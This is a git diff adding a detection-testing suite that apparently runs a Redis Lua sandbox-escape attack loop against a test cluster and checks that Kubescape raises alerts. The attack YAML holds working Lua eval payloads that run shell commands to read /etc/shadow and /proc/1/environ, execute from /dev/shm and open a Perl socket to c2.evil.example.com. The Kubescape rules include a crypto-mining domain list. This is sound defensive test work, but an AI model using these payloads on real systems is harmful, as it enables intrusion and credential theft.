name: drifted-binary-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/ls /tmp/drifted_redis && /tmp/drifted_redis /etc 2>&1; rm -f /tmp/drifted_redis') + local out = f:read('*a') + f:close() + return 'drifted:' .. out + successIndicators: + - responseContains: "drifted:" + expectedDetections: + - attackType: fileless + ruleID: R1001 + ruleName: "Drifted process executed" + containerName: redis + command: drifted_redis + + # ─── Attack 7: Execution from /dev/shm (R1000) ────────────────────────── + - name: exec-from-devshm + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/echo /dev/shm/malicious && /dev/shm/malicious pwned 2>&1; rm -f /dev/shm/malicious') + local out = f:read('*a') + f:close() + return 'shm:' .. out + successIndicators: + - responseContains: "shm:" + expectedDetections: + - attackType: fileless + ruleID: R1000 + ruleName: "Process executed from malicious source" + containerName: redis + + # ─── Attack 8: Read /proc/*/environ (R0008) ───────────────────────────── + - name: read-proc-environ + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n" | head -3 || echo no_environ') + local out = f:read('*a') + f:close() + return 'environ:' .. out + successIndicators: + - responseContains: "environ:" + expectedDetections: + - attackType: fileless + ruleID: R0008 + ruleName: "Read Environment Variables from procfs" + containerName: redis + command: cat + + # ─── Attack 9: Symlink over /etc/shadow (R1010) ───────────────────────── + - name: symlink-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('ln -sf /etc/shadow /tmp/shadow_link 2>&1 && cat /tmp/shadow_link 2>/dev/null; rm -f /tmp/shadow_link') + local out = f:read('*a') + f:close() + return 'symlink:' .. out + successIndicators: + - responseContains: "symlink:" + expectedDetections: + - attackType: fileless + ruleID: R1010 + ruleName: "Soft link created over sensitive file" + containerName: redis + + # ─── Attack 10: Crypto Mining Domain DNS (R1008) ──────────────────────── + - name: crypto-mining-dns + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts xmr.pool.minergate.com 2>&1 || echo mining_dns_done') + local out = f:read('*a') + f:close() + return 'mining_dns:' .. out + successIndicators: + - responseContains: "mining_dns:" + expectedDetections: + - attackType: fileless + ruleID: R1008 + ruleName: "Crypto Mining Domain Communication" + containerName: redis + + # ─── Attack 11: Reverse Shell Attempt via Perl HTTP (R0001 + R0005) ───── + - name: reverse-shell-perl-http + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("perl -e 'use IO::Socket::INET;my $s=IO::Socket::INET->new(PeerAddr=>\"c2.evil.example.com\",PeerPort=>80,Timeout=>2);print defined $s ? \"connected\" : \"connect_failed\";' 2>&1; echo perl_http_done") + local out = f:read('*a') + f:close() + return 'revshell:' .. out + successIndicators: + - responseContains: "revshell:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: perl + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 12: Credential Harvesting via /etc/passwd + id (R0001) ────── + - name: credential-harvest-passwd + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("awk -F: '$3==0{print $1}' /etc/passwd && id 2>&1") + local out = f:read('*a') + f:close() + return 'creds:' .. out + successIndicators: + - responseContains: "creds:root" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: awk diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml new file mode 100644 index 00000000000..10635ccdc02 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml @@ -0,0 +1,153 @@ +# Job that runs bobctl in a tight loop to continuously execute the +# CVE-2025-49844 attack suite against the vulnerable redis deployment. The +# bobctl binary is downloaded at container startup by an init container, so +# no image build is needed. The attack suite YAML is mounted from the +# bob-suite-attack ConfigMap at /suite/redis-attacks.yaml. +# +# bobctl reaches the redis Service via kubectl-port-forward style: +# it queries the apiserver for the Service + a backing Pod, then opens a +# pods/portforward stream to that Pod. The dedicated ServiceAccount + +# Role below grant exactly the verbs required for that flow. +# +# The Job's pod must land in the `redis` namespace (same as the Redis +# Service and Kubescape ApplicationProfile) so the attack traffic is +# recorded against this namespace's profile. +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: bobctl + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +rules: + - apiGroups: [""] + resources: ["services", "pods"] + verbs: ["get", "list"] + - apiGroups: [""] + resources: ["pods/portforward"] + verbs: ["create", "get"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: bobctl-port-forward +subjects: + - kind: ServiceAccount + name: bobctl + namespace: redis +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: bobctl-attack + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +spec: + backoffLimit: 100 + ttlSecondsAfterFinished: 600 + template: + metadata: + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc + spec: + restartPolicy: OnFailure + serviceAccountName: bobctl + initContainers: + - name: fetch-bobctl + image: curlimages/curl:8.15.0 + command: + - sh + - -c + - | + set -euo pipefail + curl -fsSL -o /bob/bobctl \ + https://github.com/k8sstormcenter/bob/releases/latest/download/bobctl-linux-amd64 + chmod +x /bob/bobctl + volumeMounts: + - name: bob-bin + mountPath: /bob + containers: + - name: bobctl + image: alpine:3.19 + command: + - sh + - -c + - | + set -u + # bobctl's CLI bootstrap unconditionally tries to read + # ~/.kube/config (it uses kubectl-style proxy routing for + # service targets), so synthesize a minimal in-cluster + # kubeconfig from the pod's service-account mount before + # invoking it. tokenFile is preferred over inline token so + # SA-token rotation works. + mkdir -p /root/.kube + cat > /root/.kube/config <<'EOF' + apiVersion: v1 + kind: Config + clusters: + - name: in-cluster + cluster: + certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + server: https://kubernetes.default.svc + contexts: + - name: in-cluster + context: + cluster: in-cluster + user: in-cluster + namespace: redis + current-context: in-cluster + users: + - name: in-cluster + user: + tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token + EOF + # Small gap lets the service DNS entry propagate in very fresh namespaces. + sleep 5 + while true; do + /bob/bobctl attack \ + --attack-suite /suite/redis-attacks.yaml \ + -n redis --format json || true + sleep 5 + done + volumeMounts: + - name: bob-bin + mountPath: /bob + readOnly: true + - name: bob-suite + mountPath: /suite + readOnly: true + resources: + requests: + cpu: 100m + memory: 64Mi + limits: + cpu: 500m + memory: 256Mi + volumes: + - name: bob-bin + emptyDir: {} + - name: bob-suite + configMap: + name: bob-suite-attack diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md new file mode 100644 index 00000000000..4ee6abddd9f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md @@ -0,0 +1,77 @@ +# Helm-rendered Kubescape + Vector manifests for the sovereign-soc suite + +`PrerenderedDeploy` only applies static YAML; it does not invoke helm at +runtime. So the Kubescape and Vector charts used by the Sovereign SOC demo +are pre-rendered once and committed here. The source values files that +went in are also committed so the render is reproducible. + +Sources: + +- `kubescape-values.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/values.yaml). +- `kubescape-default-rules.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/default-rules.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/default-rules.yaml). +- `vector-values.yaml` — based on + [`k8sstormcenter/soc@main:tree/vector-lab/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/vector-lab/values.yaml) + with the ClickHouse sink `endpoint:` rewritten to the external forensic + endpoint (`http://clickhouse.forensic.austrianopencloudcommunity.org:8123`) + so Vector can write to CH from any experiment cluster, not just the + forensic cluster's in-cluster DNS. + +## How to re-render + +From inside the dev docker container, with its helm in `$PATH`: + +```sh +helm repo add kubescape https://kubescape.github.io/helm-charts/ +helm repo add vector https://helm.vector.dev +helm repo update + +# Kubescape operator (pinned to the version used by soc/Makefile). +helm template kubescape kubescape/kubescape-operator \ + --version 1.30.2 \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml + +# Split the kube-system-namespaced RoleBinding (storage-auth-reader) into +# its own file, because PrerenderedDeploy only tolerates a single namespace +# per step. +python3 - <<'PY' +import yaml, os +base = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered" +with open(f"{base}/kubescape.rendered.yaml") as f: + docs = list(yaml.safe_load_all(f)) +main, ks = [], [] +for d in docs: + if d is None: continue + ns = (d.get("metadata") or {}).get("namespace") + (ks if ns == "kube-system" else main).append(d) +with open(f"{base}/kubescape.rendered.yaml", "w") as f: + yaml.safe_dump_all(main, f, sort_keys=False) +with open(f"{base}/kubescape.rendered.kube-system.yaml", "w") as f: + yaml.safe_dump_all(ks, f, sort_keys=False) +PY + +# Vector (version pinned to whatever's current on the vector repo). +helm template vector vector/vector \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml +``` + +## Why the kube-system split + +The kubescape-operator chart includes a single `RoleBinding` in +`kube-system` — `storage-auth-reader` — that delegates auth checking to +the kube-apiserver's `extension-apiserver-authentication-reader` Role +(required for the storage APIService aggregation to work; without it the +`ApplicationProfile` CRD can't be read, which means node-agent can't +compare workload behavior against the pre-populated redis profile). + +`RoleBinding` objects must reside in the same namespace as the Role they +reference, so we can't rewrite it into `honey`. And +`PrerenderedDeploy.getNamespace()` errors if a single concatenated YAML +touches more than one namespace. We split it into its own step and flag +it `skip_namespace_delete: true` on the proto spec so teardown never +tries to `kubectl delete ns kube-system`. diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml new file mode 100644 index 00000000000..349c704f8a6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml @@ -0,0 +1,746 @@ +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey +spec: + rules: + - description: Detects unexpected process launches that are not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected process launched: ' + event.comm + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + id: R0001 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Unexpected process launched + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - process + - exec + - applicationprofile + - description: Detects unexpected file access that is not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected file access detected: ' + event.comm + ' with PID ' + + string(event.pid) + ' to ' + event.path + ruleExpression: + - eventType: open + expression: >- + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0002 + isTriggerAlert: true + mitreTactic: TA0009 + mitreTechnique: T1005 + name: Files Access Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: true + tags: + - anomaly + - file + - open + - applicationprofile + - description: >- + Detects unexpected system calls that are not whitelisted by application + profile + enabled: false + expressions: + message: >- + 'Unexpected system call detected: ' + event.syscallName + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + uniqueId: event.syscallName + id: R0003 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Syscalls Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - syscall + - applicationprofile + - description: >- + Detects unexpected capabilities that are not whitelisted by application + profile + enabled: true + expressions: + message: >- + 'Unexpected capability used: ' + event.capName + ' in syscall ' + + event.syscallName + ' with PID ' + string(event.pid) + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + uniqueId: event.comm + '_' + event.capName + id: R0004 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Linux Capabilities Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - capabilities + - applicationprofile + - description: >- + Detecting unexpected domain requests that are not whitelisted by + application profile. + enabled: true + expressions: + message: >- + 'Unexpected domain communication: ' + event.name + ' from: ' + + event.containerName + ruleExpression: + - eventType: dns + expression: >- + !event.name.endsWith('.svc.cluster.local.') && + !nn.is_domain_in_egress(event.containerId, event.name) + uniqueId: event.comm + '_' + event.name + id: R0005 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: DNS Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - dns + - anomaly + - networkprofile + - description: Detecting unexpected access to service account token. + enabled: true + expressions: + message: >- + 'Unexpected access to service account token: ' + event.path + ' with + flags: ' + event.flags.join(',') + ruleExpression: + - eventType: open + expression: > + ((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount') + && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token'))) && + !ap.was_path_opened_with_suffix(event.containerId, '/token') + uniqueId: event.comm + id: R0006 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + name: Unexpected service account token access + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - serviceaccount + - applicationprofile + - description: Detecting execution of kubernetes client + enabled: true + expressions: + message: >- + eventType == 'exec' ? 'Kubernetes client (' + event.comm + ') was + executed with PID ' + string(event.pid) : 'Network connection to + Kubernetes API server from container ' + event.containerName + ruleExpression: + - eventType: exec + expression: >- + (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && + k8s.is_api_server_address(event.dstAddr) && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: >- + eventType == 'exec' ? 'exec_' + event.comm : 'network_' + + event.dstAddr + id: R0007 + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + name: Workload uses Kubernetes API unexpectedly + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - exec + - network + - anomaly + - applicationprofile + - description: Detecting reading environment variables from procfs. + enabled: true + expressions: + message: >- + 'Reading environment variables from procfs: ' + event.path + ' by + process ' + event.comm + ruleExpression: + - eventType: open + expression: > + event.path.startsWith('/proc/') && + event.path.endsWith('/environ') && + !ap.was_path_opened_with_suffix(event.containerId, '/environ') + uniqueId: event.comm + '_' + event.path + id: R0008 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + name: Read Environment Variables from procfs + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - procfs + - environment + - applicationprofile + - description: Detecting eBPF program load. + enabled: true + expressions: + message: >- + 'bpf program load system call (bpf) was called by process (' + + event.comm + ') with command (BPF_PROG_LOAD)' + ruleExpression: + - eventType: bpf + expression: >- + event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + id: R0009 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + name: eBPF Program Load + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - bpf + - ebpf + - applicationprofile + - description: Detecting access to sensitive files. + enabled: true + expressions: + message: >- + 'Unexpected sensitive file access: ' + event.path + ' by process ' + + event.comm + ruleExpression: + - eventType: open + expression: >- + event.path.startsWith('/etc/shadow') && + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Unexpected Sensitive File Access + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - files + - anomaly + - applicationprofile + - description: >- + Detecting unexpected egress network traffic that is not whitelisted by + application profile. + enabled: false + expressions: + message: >- + 'Unexpected egress network communication to: ' + event.dstAddr + ':' + + string(event.dstPort) + ' using ' + event.proto + ' from: ' + + event.containerName + ruleExpression: + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + id: R0011 + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + name: Unexpected Egress Network Traffic + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - whitelisted + - network + - anomaly + - networkprofile + - description: 'Detecting exec calls that are from malicious source like: /dev/shm' + enabled: true + expressions: + message: >- + 'Execution from malicious source: ' + event.exepath + ' in directory ' + + event.cwd + ruleExpression: + - eventType: exec + expression: > + (event.exepath == '/dev/shm' || + event.exepath.startsWith('/dev/shm/')) || (event.cwd == '/dev/shm' + || event.cwd.startsWith('/dev/shm/') || + (parse.get_exec_path(event.args, + event.comm).startsWith('/dev/shm/'))) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1000 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from malicious source + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - exec + - signature + - malicious + - description: Detecting exec calls of binaries that are not included in the base image + enabled: true + expressions: + message: >- + 'Process (' + event.comm + ') was executed and is not part of the + image' + ruleExpression: + - eventType: exec + expression: > + (event.upperlayer == true || + event.pupperlayer == true) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1001 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + name: Drifted process executed + profileDependency: 1 + severity: 8 + supportPolicy: false + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - description: Detecting Kernel Module Load. + enabled: true + expressions: + message: >- + 'Kernel module (' + event.module + ') loading attempt with syscall (' + + event.syscallName + ') was called by process (' + event.comm + ')' + ruleExpression: + - eventType: kmod + expression: >- + event.syscallName == 'init_module' || event.syscallName == + 'finit_module' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + id: R1002 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + name: Process tries to load a kernel module + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - kmod + - kernel + - module + - load + - description: Detecting ssh connection to disallowed port + enabled: false + expressions: + message: >- + 'Malicious SSH connection attempt to ' + event.dstIp + ':' + + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: >- + dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && + !nn.was_address_in_egress(event.containerId, event.dstIp) + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + id: R1003 + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + name: Disallowed ssh connection + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - description: Detecting exec calls from mounted paths. + enabled: true + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) && + k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) + || parse.get_exec_path(event.args, event.comm).startsWith(mount)) + uniqueId: event.comm + id: R1004 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from mount + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - exec + - mount + - applicationprofile + - description: Detecting Fileless Execution + enabled: true + expressions: + message: >- + 'Fileless execution detected: exec call "' + event.comm + '" is from a + malicious source' + ruleExpression: + - eventType: exec + expression: >- + event.exepath.contains('memfd') || + event.exepath.startsWith('/proc/self/fd') || + event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1005 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + name: Fileless execution detected + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - fileless + - execution + - malicious + - description: >- + Detecting Unshare System Call usage, which can be used to escape + container. + enabled: true + expressions: + message: >- + 'Unshare system call (unshare) was called by process (' + event.comm + + ')' + ruleExpression: + - eventType: unshare + expression: >- + event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + uniqueId: event.comm + '_' + 'unshare' + id: R1006 + isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + name: Process tries to escape container + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - description: Detecting XMR Crypto Miners by randomx algorithm usage. + enabled: true + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + ruleExpression: + - eventType: randomx + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1007 + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + name: Crypto miner launched + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - crypto + - miners + - malicious + - description: Detecting Crypto miners communication by domain + enabled: true + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + ruleExpression: + - eventType: dns + expression: >- + event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', + 'btm.antpool.com.', 'c3pool.com.', 'c4pool.org.', + 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', + 'de.minexmr.com.', 'eth-ar.dwarfpool.com.', + 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', + 'eth-br.dwarfpool.com.', 'eth-cn.dwarfpool.com.', + 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', + 'eth-hk.dwarfpool.com.', 'eth-jp1.nanopool.org.', + 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', + 'eth-us-west1.nanopool.org.', 'eth-us.dwarfpool.com.', + 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', + 'eu.stratum.slushpool.com.', 'eu1.ethermine.org.', + 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', + 'miningmadness.com.', 'monero.cedric-crispin.com.', + 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', + 'monerohash.com.', 'moneroocean.stream.', 'monerop.com.', + 'multi-pools.com.', 'p2pool.io.', 'pool.kryptex.com.', + 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', + 'prohashing.com.', 'rx.unmineable.com.', 'sg.minexmr.com.', + 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', + 'stratum-btm.antpool.com.', 'stratum-dash.antpool.com.', + 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', + 'stratum.antpool.com.', 'supportxmr.com.', 'trustpool.cc.', + 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', + 'web.xmrpool.eu.', 'www.domajorpool.com.', 'www.dxpool.com.', + 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', + 'xmr-eu1.nanopool.org.', 'xmr-eu2.nanopool.org.', + 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', + 'xmr.crypto-pool.fr.', 'xmr.gntl.uk.', 'xmr.nanopool.org.', + 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', + 'zec.antpool.com.', 'zergpool.com.', 'auto.c3pool.org.', + 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + uniqueId: event.name + '_' + event.comm + id: R1008 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: Crypto Mining Domain Communication + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - dns + - description: Detecting Crypto Miners by suspicious port usage. + enabled: true + expressions: + message: >- + 'Detected crypto mining related port communication on port ' + + string(event.dstPort) + ' to ' + event.dstAddr + ' with protocol ' + + event.proto + ruleExpression: + - eventType: network + expression: >- + event.proto == 'TCP' && event.pktType == 'OUTGOING' && + event.dstPort in [3333, 45700] && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.comm + '_' + string(event.dstPort) + id: R1009 + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + name: Crypto Mining Related Port Communication + profileDependency: 1 + severity: 3 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - description: Detects symlink creation over sensitive files + enabled: true + expressions: + message: >- + 'Symlink created over sensitive file: ' + event.oldPath + ' -> ' + + event.newPath + ruleExpression: + - eventType: symlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Soft link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - anomaly + - symlink + - applicationprofile + - description: Detecting ld_preload hook techniques. + enabled: false + expressions: + message: >- + eventType == 'exec' ? 'Process (' + event.comm + ') is using a dynamic + linker hook: ' + process.get_ld_hook_var(event.pid) : 'The dynamic + linker 